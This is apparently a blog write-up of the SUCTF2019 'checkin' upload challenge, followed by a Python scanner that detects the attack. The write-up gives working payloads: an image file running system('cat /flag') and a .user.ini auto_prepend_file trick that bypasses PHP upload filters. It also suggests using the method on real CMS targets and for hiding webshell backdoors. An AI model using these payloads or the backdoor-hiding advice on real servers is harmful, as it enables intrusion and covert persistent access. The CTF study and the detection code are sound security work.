[SUCTF2019] checkin (.user.ini and exif_imagetype() bypass)

0x01 Challenge description

Opening the page shows a file upload form.

1. First we try to upload a php file.
The response says the file suffix is wrong.


2. Next we try to upload a picture.

From the response we can guess that exif_imagetype() is used to decide whether the file is a picture. This is easy to bypass: put an image header at the start of the file, for example the GIF header GIF89a.


3. We add PHP code to the picture.
The uploaded file must not contain <?, so we can bypass the check with other ways of opening a PHP block:

<script language="php">xxx</script>
<% xxx %>
<? xxx ?>


0x02 Summary of the approach

1. Uploaded files must not contain <?
2. Uploaded files must start with an image header

Solution: first upload a .user.ini, which makes PHP parse an image that contains PHP code. That bypasses both restrictions.

Contents of the uploaded picture a.gif:
GIF89a
<script language='php'>system('cat /flag');</script>
Contents of the uploaded .user.ini:
GIF89a
auto_prepend_file=a.gif

The line auto_prepend_file=a.gif means that every php file in the current folder will include a.gif.


0x03 Answer

After uploading the two files, we directly access index.php in the upload directory.
The challenge deliberately places an accessible php file in the upload directory, so that file includes the picture code I uploaded. In real deployments this is rare.



0x04 Practical use of .user.ini

As described above, using .user.ini requires the following conditions:

  • The server-side scripting language is PHP
  • The server runs PHP in CGI / FastCGI mode
  • The upload directory contains an executable php file

From this point of view, .user.ini applies more widely than .htaccess; after all, .htaccess can only be used with Apache.

On closer inspection, though, "the upload directory contains an executable php file" is a demanding requirement for the upload function: presumably no developer would store uploads in the site's main directory or keep php files in the upload folder.

But it is not hopeless. Combined with other vulnerabilities, depending on the actual situation, it can work surprisingly well. Some time ago I came across a CMS that did not check for ../ in the upload path, so files could be uploaded to any directory; in that case it is very likely that .user.ini can be used.

In addition, .user.ini is a good way to hide a backdoor: leaving a .user.ini and our image webshell in a directory that already contains php files hides the backdoor.
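
A defender's check for the pattern this section describes, as an added example that is not part of the original write-up: it walks a web root and reports any .user.ini that sets auto_prepend_file or auto_append_file, and any image file that contains a PHP open tag. The function names, the extension list and the sample tree are assumptions made for the example, and it assumes PHP's default user_ini.filename (.user.ini).

```python
import os
import re
import tempfile

# Directives that make PHP include a file before or after every script it serves.
INI_RE = re.compile(
    rb"^\s*(auto_prepend_file|auto_append_file)\s*=\s*[\"']?([^\"'\r\n;]+)",
    re.I | re.M)
# "<?php" plus the <script language=php> form used to get past a "<?" filter.
# Bare "<?" is left out: it shows up by chance in compressed image data.
PHP_RE = re.compile(rb"<\?php|<script\s+language\s*=\s*[\"']?php", re.I)
IMAGE_EXT = (".gif", ".jpg", ".jpeg", ".png", ".bmp", ".webp")

def scan(root):
    """Return sorted (kind, relative_path, detail) findings under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            with open(path, "rb") as fh:
                data = fh.read(1 << 20)  # only the first 1 MiB is inspected
            if name == ".user.ini":
                for m in INI_RE.finditer(data):
                    target = m.group(2).decode(errors="replace").strip()
                    findings.append(("ini-include", rel, target))
            elif name.lower().endswith(IMAGE_EXT):
                hit = PHP_RE.search(data)
                if hit:
                    findings.append(("php-in-image", rel, hit.group(0).decode()))
    return sorted(findings)

def build_sample(root):
    """Constructed sample tree: the two uploads from the write-up plus clean files."""
    up = os.path.join(root, "uploads")
    os.makedirs(up)
    samples = {
        ".user.ini": b"GIF89a\nauto_prepend_file=a.gif\n",
        "a.gif": b"GIF89a\n<script language='php'>system('cat /flag');</script>",
        "index.php": b"<?php echo 'ok';",
        "clean.gif": b"GIF89a\x01\x00\x01\x00\x00\x00\x00;",
    }
    for name, body in samples.items():
        with open(os.path.join(up, name), "wb") as fh:
            fh.write(body)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        for finding in scan(tmp):
            print(*finding, sep="\t")
```

A .user.ini that starts with GIF89a, as in the write-up, is still reported, because the directive is matched per line rather than by parsing the whole file as INI.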

Origin blog.csdn.net/a3320315/article/details/102923965